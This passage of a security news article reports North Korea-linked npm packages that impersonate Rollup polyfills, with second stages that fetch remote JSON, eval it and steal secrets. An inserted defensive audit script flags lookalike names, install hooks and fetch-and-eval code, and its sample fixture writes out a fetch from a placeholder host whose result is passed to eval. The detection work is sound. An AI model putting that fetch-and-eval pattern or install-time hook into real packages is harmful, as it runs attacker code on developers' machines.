North Korea-Linked npm Packages Mimic Rollup Polyfills to Steal Developer Secrets

https://thehackernews.com/2026/07/north-korea-linked-npm-packages-mimic.html

Publish Date: 2026-07-03 12:07:00

Source Domain: thehackernews.com

Threat actors with ties to North Korea have been linked to a fresh set of malicious npm packages that masquerade as Rollup polyfill tooling to facilitate remote access and data theft.

According to JFrog, the packages “rollup-packages-polyfill-core” and “rollup-runtime-polyfill-core” mimic the legitimate “rollup-plugin-polyfill-node” project, down to the description, repository metadata, and package shape.

“The lookalike packages place themselves in the same rollup, polyfill, core, and node naming space, which can look plausible during a quick dependency review,” JFrog said in a technical write-up of the campaign.

The campaign also involves four other packages, all of which have since been removed from the npm registry –

  • quirky-token
  • react-icon-svgs
  • rollup-plugin-polyfill-connect
  • swift-parse-stream

What’s noteworthy here is that “rollup-packages-polyfill-core” installs and loads “swift-parse-stream,” while “rollup-runtime-polyfill-core” installs and loads “quirky-token.” In a similar fashion, “react-icon-svgs” has been found to install “rollup-plugin-polyfill-connect” as a second stage.

“The second-stage packages are near-identical SVG utilities that fetch a JSON object from JSONKeeper and eval the model field,” the cybersecurity company said. “This layered structure, together with the lookalike names, legitimate-looking metadata, hidden install-time execution, environment checks, and credential-theft/remote-access payloads, is similar to previous North Korean Lazarus-linked npm campaigns.”
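The three warning signs described above (a lookalike name in the same token space as a legitimate package, an install-time lifecycle script, and fetched JSON passed to eval) can be checked mechanically during dependency review. The following audit is an added example, not code from the article or from JFrog; the manifests, the setup.js source and the example.invalid URL are constructed for illustration.

```javascript
// Added example (not from the article or JFrog): a defender-side audit that flags
// the three warning signs described above. All manifests/sources are constructed.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall"];
// Legitimate project named in the article that the lookalikes imitate.
const KNOWN_GOOD = ["rollup-plugin-polyfill-node"];

// Split a package name into its hyphen/slash-separated tokens.
function tokens(name) {
  return new Set(name.toLowerCase().split(/[-_./@]+/).filter(Boolean));
}

// Count tokens two package names share (crude lookalike heuristic).
function sharedTokens(a, b) {
  const tb = tokens(b);
  return [...tokens(a)].filter((t) => tb.has(t)).length;
}

// Returns a list of finding tags for one package manifest plus its source files.
function auditPackage(manifest, sources = {}) {
  const findings = [];
  for (const good of KNOWN_GOOD) {
    if (manifest.name !== good && sharedTokens(manifest.name, good) >= 2) {
      findings.push(`lookalike-name:${good}`);
    }
  }
  const scripts = manifest.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (scripts[hook]) findings.push(`install-hook:${hook}`); // hidden install-time execution
  }
  for (const [file, src] of Object.entries(sources)) {
    // Remote content fetched and a field of it passed to eval, as with the "model" field above.
    if (/\beval\s*\(/.test(src) && /\bfetch\s*\(|https?:\/\//.test(src)) {
      findings.push(`fetch-and-eval:${file}`);
    }
  }
  return findings;
}

// Constructed sample inputs: the real package and a lookalike (placeholder URL).
const SAMPLES = [
  { manifest: { name: "rollup-plugin-polyfill-node", scripts: { test: "node test.js" } }, sources: {} },
  { manifest: { name: "rollup-packages-polyfill-core", scripts: { postinstall: "node setup.js" } },
    sources: { "setup.js": 'fetch("https://example.invalid/cfg").then(r => r.json()).then(j => eval(j.model));' } },
];

// Audit every sample and key the findings by package name.
function auditAll(samples) {
  return Object.fromEntries(samples.map((s) => [s.manifest.name, auditPackage(s.manifest, s.sources)]));
}
console.log(JSON.stringify(auditAll(SAMPLES), null, 2));
```

In practice the manifests and sources would come from node_modules after a dry-run install, and the token heuristic is only a triage aid: a clean result does not clear a package, and each flagged one still needs manual review.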

It’s worth emphasizing here that this is not the first time North Korean threat actors have uploaded npm packages impersonating Rollup polyfill tools. In April 2026, Panther detailed a sustained npm campaign that involved publishing 108 malicious npm packages spanning 261 versions to deliver BeaverTail and OtterCookie, two known malware families linked to Contagious Interview. Among those packages was “rollup-plugin-polyfill-route,” which was published on March 20,…